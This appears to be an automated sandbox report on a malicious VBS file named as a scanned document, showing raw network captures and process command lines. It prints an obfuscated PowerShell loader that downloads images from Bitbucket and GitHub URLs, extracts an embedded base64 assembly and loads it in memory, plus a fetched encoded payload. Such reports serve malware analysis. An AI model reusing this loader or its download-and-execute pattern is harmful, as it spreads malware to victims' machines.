2024-10-24 06:46:57 UTC	16384	IN	Data Raw: ea 25 50 07 04 0f 3a aa b1 fc b5 a4 83 0a ee 26 a5 2c 2f 52 d2 c9 33 00 f9 1a ab 38 64 24 d1 77 b7 c9 05 26 65 5c f3 c5 3d 6f 36 52 13 c9 3c f9 55 49 9c 9c 1e e7 e9 26 9d ff 00 12 f9 78 3c 81 55 bd a0 94 89 f7 f2 c5 e1 dc f1 ef 4c ae 32 44 72 0c 8f 39 f3 35 1b fc 44 84 72 66 91 7e ea 52 76 c9 8e 67 d6 ac 42 ac 01 29 a0 d9 8b e2 ab 75 12 40 1e 60 56 5f d4 3b 51 71 6a a7 0f 21 29 3c 4d 5e b3 17 72 db 80 91 c8 20 7a d6 6b d4 6c a9 63 1c b9 23 b1 1c 57 4f d1 ab 7b d1 97 ad 9a d8 d9 8f 6b 0c c9 62 79 4a 52 3b 7d 2a 89 95 b9 55 db 85 44 98 f6 ed 53 da a0 2a f6 ed c3 32 27 d6 a2 45 82 bc e0 88 e7 de bd 63 47 15 08 a6 70 5a b9 39 49 b2 ba eb 04 89 09 83 31 04 d1 85 99 92 20 f1 ef 56 4b 6c 22 56 20 20 12 7d a6 97 fe 04 59 04 f8 41 47 d7 d2 b5 16 a1 14 55 52 7c 95 Data Ascii: %P:&,/R38d$w&e\=o6R<UI&x<UL2Dr95Drf~RvgB)u@`V_;Qqj!)<M^r zklc#WO{kbyJR;}UDS2'EcGpZ9I1 VKl"V }YAGUR\|
2024-10-24 06:46:57 UTC	16384	IN	Data Raw: 61 76 96 c5 2a 41 07 bf 9d 67 fa af 01 f7 70 a3 b4 48 fe a9 31 5b da 2b a3 64 b0 8c 9b ea 94 56 46 97 79 b6 1f 3f 2a a2 7d 4f 7a 67 70 fb 0f a8 90 a4 cf ae ee c2 a2 92 10 90 a3 06 0f 79 34 93 c9 10 63 88 e4 f3 de ba 1a ea c6 0c 9b 27 91 67 51 04 ed 20 8f 3e 69 a3 ad 6e 33 cf 3c d1 dc 41 50 03 b4 f6 13 c5 37 75 b7 12 01 f9 8f d0 f6 ab 71 e0 81 ae 0f 2d 2a 27 f1 f3 eb 44 f0 16 4f 72 01 a5 ed db 52 91 11 df d8 cd 2e d5 ae d5 18 80 a3 c8 07 91 53 2e c4 72 42 0d 32 a4 ab 70 54 47 10 29 68 56 ef ad 38 65 21 07 b4 cd 2c 84 a5 46 02 39 ee 3d 29 dc f0 44 e0 35 46 e4 24 cc c9 06 20 d2 4a bb 71 6b 22 0c 7b f7 35 28 96 01 f2 81 db ff 00 35 26 fd 92 66 21 26 7d 3d 69 46 6b 23 35 e0 8f 5b ae 2d 12 49 f9 7d 4d 0b 2a 59 03 99 04 7d 29 e2 f1 46 e3 e6 42 80 03 d3 9a 4e e2 Data Ascii: avAgpH1[+dVFy?}Ozgpy4c'gQ >in3<AP7uq-'DOrR.S.rB2pTG)hV8e!,F9=)D5F$ Jqk"{5(5&f!&}=iFk#5[-I}MY})FBN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	185.199.108.133	443	8	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 06:47:03 UTC	94	OUT	GET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1 Host: raw.githubusercontent.com
2024-10-24 06:47:03 UTC	903	IN	HTTP/1.1 200 OK Connection: close Content-Length: 624072 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "172554e9ebd6f3e01fcc8fe7c85300800defd675ef48345a1817f8928e009512" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: A847:27B52F:584B21:61A642:6719ED65 Accept-Ranges: bytes Date: Thu, 24 Oct 2024 06:47:03 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdal2120108-DFW X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1729752423.213437,VS0,VE277 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 9af150ebc7040ab160b4504463178cb363b27d73 Expires: Thu, 24 Oct 2024 06:52:03 GMT Source-Age: 0
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 44 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38 4f 30 75 44 6e 37 51 35 4f 51 75 44 6a 37 67 34 4f 45 75 44 67 37 41 33 4f 73 74 44 58 37 51 30 4f 38 73 44 4f 37 51 7a 4f 77 73 44 4c 37 77 78 4f 59 73 44 43 36 41 76 4f 6f 72 44 35 36 41 75 4f 63 72 44 32 36 67 73 4f 45 72 44 74 36 77 70 4f 55 71 44 6b 36 77 6f 4f 38 70 44 65 36 67 6d 4f 6b 70 44 56 36 77 6a 4f 30 6f 44 4d 36 41 69 4f 49 6f 44 41 35 77 66 4f 34 6e 44 39 35 51 65 4f 4d 6e 44 79 35 41 62 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 67 59 4f 45 6d 44 64 35 77 56 4f 55 6c 44 55 35 41 55 4f 38 6b 44 4c 35 51 52 4f 4d 6b 44 43 35 51 41 4f 30 6a 44 38 34 41 4f 4f 49 6a 44 77 34 77 4c 4f 34 69 44 74 34 51 4b 4f 67 69 44 6b 34 67 48 4f 77 68 44 62 34 67 47 4f 6b 68 44 56 34 41 46 4f 41 68 44 4b 34 Data Ascii: DOkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDg7A3OstDX7Q0O8sDO7QzOwsDL7wxOYsDC6AvOorD56AuOcrD26gsOErDt6wpOUqDk6woO8pDe6gmOkpDV6wjO0oDM6AiOIoDA5wfO4nD95QeOMnDy5AbOomDp5AaOcmDm5gYOEmDd5wVOUlDU5AUO8kDL5QROMkDC5QAO0jD84AOOIjDw4wLO4iDt4QKOgiDk4gHOwhDb4gGOkhDV4AFOAhDK4
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 73 69 44 70 34 77 4a 4f 55 69 44 6a 34 51 49 4f 38 68 44 64 34 77 47 4f 6b 68 44 58 34 51 46 4f 4d 68 44 52 34 77 44 4f 30 67 44 4c 34 51 43 4f 63 67 44 46 34 77 41 4f 45 63 44 2f 33 51 2f 4e 73 66 44 35 33 77 39 4e 55 66 44 7a 33 51 38 4e 38 65 44 74 33 77 36 4e 6b 65 44 6e 33 51 35 4e 4d 65 44 68 33 77 33 4e 30 64 44 62 33 51 32 4e 63 64 44 56 33 77 30 4e 45 64 44 50 33 51 7a 4e 73 63 44 4a 33 77 78 Data Ascii: UoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOsiDp4wJOUiDj4QIO8hDd4wGOkhDX4QFOMhDR4wDO0gDL4QCOcgDF4wAOEcD/3Q/NsfD53w9NUfDz3Q8N8eDt3w6NkeDn3Q5NMeDh3w3N0dDb3Q2NcdDV3w0NEdDP3QzNscDJ3wx
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 44 48 7a 51 78 4d 51 4d 44 44 7a 67 77 4d 45 4d 44 41 79 77 76 4d 34 4c 44 38 79 67 4f 41 41 41 41 58 41 55 41 45 41 6f 44 48 36 67 68 4f 55 6f 44 45 36 77 67 4f 49 6f 44 42 36 41 51 4f 38 6e 44 65 72 54 67 44 35 51 66 4f 77 6e 44 37 35 67 65 4f 6b 6e 44 34 35 77 64 4f 59 6e 44 31 35 41 64 4f 4d 6e 44 79 35 51 63 4f 41 6e 44 76 35 67 62 4f 30 6d 44 73 35 77 61 4f 6f 6d 44 70 35 41 61 4f 63 6d 44 6d 35 51 5a 4f 51 6d 44 6a 35 67 59 4f 45 6d 44 67 35 77 58 4f 34 6c 44 64 35 41 58 4f 73 6c 44 61 35 51 57 4f 67 6c 44 58 35 67 56 4f 55 6c 44 55 35 77 55 4f 49 6c 44 52 35 41 55 4f 38 6b 44 4f 35 51 54 4f 77 6b 44 4c 35 67 53 4f 6b 6b 44 49 35 77 52 4f 59 6b 44 46 35 41 52 4f 4d 6b 44 43 35 51 51 4f 41 67 44 2f 34 67 50 4f 30 6a 44 38 34 77 4f 4f 6f 6a 44 35 34 Data Ascii: DHzQxMQMDDzgwMEMDAywvM4LD8ygOAAAAXAUAEAoDH6ghOUoDE6wgOIoDB6AQO8nDerTgD5QfOwnD75geOknD45wdOYnD15AdOMnDy5QcOAnDv5gbO0mDs5waOomDp5AaOcmDm5QZOQmDj5gYOEmDg5wXO4lDd5AXOslDa5QWOglDX5gVOUlDU5wUOIlDR5AUO8kDO5QTOwkDL5gSOkkDI5wROYkDF5AROMkDC5QQOAgD/4gPO0jD84wOOojD54
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b 44 44 35 51 41 4f 38 6a 44 39 34 77 4f 4f 6b 6a 44 33 34 51 4e 4f 4d 6a 44 78 34 77 4c 4f 30 69 44 72 34 51 4b 4f 63 69 44 6c 34 77 49 4f 45 69 44 66 34 51 48 4f 73 68 44 5a 34 77 46 4f 55 68 44 54 34 51 45 4f 38 67 44 4e 34 77 43 4f 6b 67 44 48 34 51 42 4f 4d 67 44 42 33 77 2f 4e 30 66 44 37 33 51 65 72 54 67 44 4e 63 66 44 31 33 77 38 4e 45 66 44 76 33 51 37 4e 73 65 44 70 33 77 35 4e 55 65 44 6a 33 51 34 4e 38 64 44 64 33 77 32 4e 6b 64 44 58 33 51 31 4e 4d 64 44 52 33 77 7a 4e 30 63 44 4c 33 51 79 4e 63 63 44 46 33 77 77 4e 45 59 44 2f 32 51 76 4e 73 62 44 35 32 77 74 Data Ascii: 5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73QerTgDNcfD13w8NEfDv3Q7NseDp3w5NUeDj3Q4N8dDd3w2NkdDX3Q1NMdDR3wzN0cDL3QyNccDF3wwNEYD/2QvNsbD52wt
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 54 34 7a 38 37 4d 33 4f 54 53 7a 30 7a 4d 78 4d 54 48 7a 45 68 4d 76 4b 7a 70 79 6b 6f 4d 42 4b 54 65 79 45 6e 4d 4f 49 54 42 78 34 64 4d 57 48 7a 76 78 73 5a 4d 66 46 54 49 77 51 4f 4d 6f 43 54 6d 77 6f 49 4d 58 42 7a 54 41 41 41 41 38 43 41 42 77 43 77 50 4c 65 72 54 67 44 7a 67 2f 73 33 50 7a 38 6a 44 65 72 54 67 44 77 75 50 48 37 44 75 65 72 54 67 44 6b 61 50 6b 7a 6a 6c 37 34 65 72 54 67 44 4f 53 76 6a 54 37 45 44 4f 6c 67 7a 48 34 73 77 4e 74 66 7a 32 33 59 74 4e 33 5a 7a 51 32 49 68 4e 4d 55 54 70 30 6f 4c 4e 72 53 7a 6e 30 38 49 4e 79 52 6a 61 30 41 30 4d 35 50 54 32 7a 30 38 4d 42 50 54 72 7a 45 36 4d 2f 4d 7a 4e 7a 6b 78 4d 52 4d 54 43 7a 45 67 4d 35 4c 44 70 79 67 49 4d 37 44 54 38 77 63 4d 4d 36 43 6a 54 77 55 45 4d 38 41 7a 4a 41 41 41 41 34 Data Ascii: T4z87M3OTSz0zMxMTHzEhMvKzpykoMBKTeyEnMOITBx4dMWHzvxsZMfFTIwQOMoCTmwoIMXBzTAAAA8CABwCwPLerTgDzg/s3Pz8jDerTgDwuPH7DuerTgDkaPkzjl74erTgDOSvjT7EDOlgzH4swNtfz23YtN3ZzQ2IhNMUTp0oLNrSzn08INyRja0A0M5PT2z08MBPTrzE6M/MzNzkxMRMTCzEgM5LDpygIM7DT8wcMM6CjTwUEM8AzJAAAA4
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 35 4d 52 4f 4c 67 54 2f 34 59 4c 4f 70 69 54 6c 34 4d 49 4f 62 63 54 75 33 41 67 4e 34 62 6a 36 32 6b 74 4e 4d 62 54 77 32 45 6f 4e 73 5a 44 57 32 77 6b 4e 44 55 7a 77 31 41 62 4e 4f 57 44 61 31 55 45 4e 38 54 7a 39 30 45 50 4e 73 54 6a 75 30 38 47 4e 49 52 44 46 7a 49 34 4d 76 4e 54 4f 7a 49 67 4d 4e 4c 44 78 79 59 72 4d 68 4b 54 63 79 6f 6c 4d 50 4a 7a 4f 79 41 6a 4d 72 49 6a 43 78 30 4e 41 41 41 41 6f 41 51 41 45 41 41 41 41 2f 73 38 50 77 65 72 54 67 44 44 65 2f 41 79 50 51 38 6a 42 65 72 54 67 44 6b 76 50 76 37 44 34 65 72 54 67 44 59 73 50 2f 36 44 75 65 72 54 67 44 45 72 50 65 72 54 67 44 35 54 61 65 72 54 67 44 51 6d 50 54 35 54 53 65 72 54 67 44 73 69 50 50 30 54 2f 39 73 65 50 63 33 6a 59 38 6b 46 50 79 73 7a 78 37 41 71 4f 37 66 6a 36 33 49 36 Data Ascii: 5MROLgT/4YLOpiTl4MIObcTu3AgN4bj62ktNMbTw2EoNsZDW2wkNDUzw1AbNOWDa1UEN8Tz90EPNsTju08GNIRDFzI4MvNTOzIgMNLDxyYrMhKTcyolMPJzOyAjMrIjCx0NAAAAoAQAEAAAA/s8PwerTgDDe/AyPQ8jBerTgDkvPv7D4erTgDYsP/6DuerTgDErPerTgD5TaerTgDQmPT5TSerTgDsiPP0T/9sePc3jY8kFPyszx7AqO7fj63I6
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 44 4d 31 45 66 4e 75 52 7a 72 30 55 4a 4e 6f 51 54 48 30 73 41 4e 46 45 44 35 77 59 45 41 41 41 41 56 41 4d 41 6f 41 41 41 41 2f 30 35 50 61 35 6a 4f 39 34 61 50 4e 32 6a 51 39 59 54 50 69 30 44 48 39 49 52 50 48 77 7a 67 38 73 48 50 7a 78 44 5a 38 6f 46 50 50 78 7a 47 37 4d 75 4f 63 72 54 6f 36 4d 6d 4f 48 70 7a 4d 35 63 65 4f 44 6e 6a 68 35 41 55 4f 6d 67 7a 2f 34 73 4d 4f 45 69 7a 65 34 6f 47 4f 46 68 54 4c 34 55 43 4f 5a 67 7a 42 33 34 65 72 54 67 44 4e 6d 66 7a 33 33 45 39 4e 45 66 7a 76 33 49 37 4e 74 65 44 70 33 59 35 4e 51 65 54 68 33 38 33 4e 30 64 44 62 33 45 32 4e 62 64 6a 53 33 55 30 4e 32 63 7a 41 32 41 76 4e 61 62 6a 7a 32 45 73 4e 38 61 6a 68 32 51 6e 4e 77 55 6a 73 31 73 5a 4e 46 51 7a 75 30 4d 4b 4e 55 52 54 53 7a 41 2f 4d 50 50 44 77 7a Data Ascii: DM1EfNuRzr0UJNoQTH0sANFED5wYEAAAAVAMAoAAAA/05Pa5jO94aPN2jQ9YTPi0DH9IRPHwzg8sHPzxDZ8oFPPxzG7MuOcrTo6MmOHpzM5ceODnjh5AUOmgz/4sMOEize4oGOFhTL4UCOZgzB34erTgDNmfz33E9NEfzv3I7NteDp3Y5NQeTh383N0dDb3E2NbdjS3U0N2czA2AvNabjz2EsN8ajh2QnNwUjs1sZNFQzu0MKNURTSzA/MPPDwz
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 44 30 51 50 77 77 44 75 38 55 4b 50 56 78 44 42 37 73 65 72 54 67 44 4f 66 76 54 7a 37 67 36 4f 65 75 6a 6a 37 6b 34 4f 42 75 54 55 37 77 30 4f 48 74 7a 4f 37 51 78 4f 50 73 6a 43 36 34 76 4f 61 72 54 31 36 41 74 4f 45 72 44 6f 36 73 70 4f 57 71 54 6a 36 59 6d 4f 68 70 44 58 36 77 6b 4f 71 6f 44 48 36 41 68 4f 42 6b 54 35 35 73 62 4f 7a 6d 44 6e 35 77 59 4f 51 6c 44 52 35 55 41 4f 61 6a 54 67 34 38 47 4f 6e 64 7a 37 30 30 65 72 54 67 44 4d 79 4f 44 68 7a 34 33 4d 79 42 41 41 41 51 49 41 43 41 4f 41 2f 77 39 50 59 2f 44 31 2f 41 39 50 4c 2f 6a 68 2f 41 7a 50 73 38 44 4b 2f 51 79 50 66 38 44 47 65 72 54 67 44 45 65 50 7a 30 54 4a 39 63 41 50 30 7a 44 52 38 45 77 4f 37 76 7a 36 37 49 38 4f 5a 75 7a 63 37 45 31 4f 4c 74 54 50 37 67 7a 4f 79 73 44 4c 37 59 79 Data Ascii: D0QPwwDu8UKPVxDB7serTgDOfvTz7g6Oeujj7k4OBuTU7w0OHtzO7QxOPsjC64vOarT16AtOErDo6spOWqTj6YmOhpDX6wkOqoDH6AhOBkT55sbOzmDn5wYOQlDR5UAOajTg48GOndz700erTgDMyODhz43MyBAAAQIACAOA/w9PY/D1/A9PL/jh/AzPs8DK/QyPf8DGerTgDEePz0TJ9cAP0zDR8EwO7vz67I8OZuzc7E1OLtTP7gzOysDL7Yy
2024-10-24 06:47:03 UTC	1378	IN	Data Raw: 74 50 45 37 6a 76 65 72 54 67 44 45 72 50 6f 35 7a 54 65 72 54 67 44 63 6b 50 67 34 7a 45 39 55 62 50 72 32 54 6d 39 4d 5a 50 4d 32 7a 64 39 45 56 50 41 31 44 4d 39 51 53 50 52 77 6a 2f 38 38 4b 50 44 75 54 4b 37 38 78 4f 56 73 7a 43 37 45 67 4f 37 66 7a 77 33 77 69 4e 66 61 54 44 31 59 49 4e 2f 54 44 65 7a 49 76 4d 6b 49 6a 45 78 30 66 4d 49 48 6a 70 78 6b 59 4d 71 46 44 56 78 63 54 4d 76 41 41 41 41 51 4a 41 43 41 4c 41 34 6b 4f 4f 55 6a 7a 76 34 49 47 41 41 41 41 45 41 49 41 6f 41 34 6a 41 39 38 4b 41 41 41 41 44 41 49 41 6b 41 30 6a 55 39 4d 55 4f 70 6d 54 6b 35 30 58 4f 38 41 41 41 41 51 42 41 43 41 49 41 41 41 41 50 72 79 54 6e 38 77 49 50 76 78 44 59 41 41 41 41 55 41 67 41 67 42 41 41 41 55 54 50 31 77 52 4e 4b 51 7a 65 72 54 67 44 30 55 4e 41 41 Data Ascii: tPE7jverTgDErPo5zTerTgDckPg4zE9UbPr2Tm9MZPM2zd9EVPA1DM9QSPRwj/88KPDuTK78xOVszC7EgO7fzw3wiNfaTD1YIN/TDezIvMkIjEx0fMIHjpxkYMqFDVxcTMvAAAAQJACALA4kOOUjzv4IGAAAAEAIAoA4jA98KAAAADAIAkA0jU9MUOpmTk50XO8AAAAQBACAIAAAAPryTn8wIPvxDYAAAAUAgAgBAAAUTP1wRNKQzerTgD0UNAA

Target ID:	0
Start time:	02:46:51
Start date:	24/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
Imagebase:	0x7ff636340000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:46:52
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##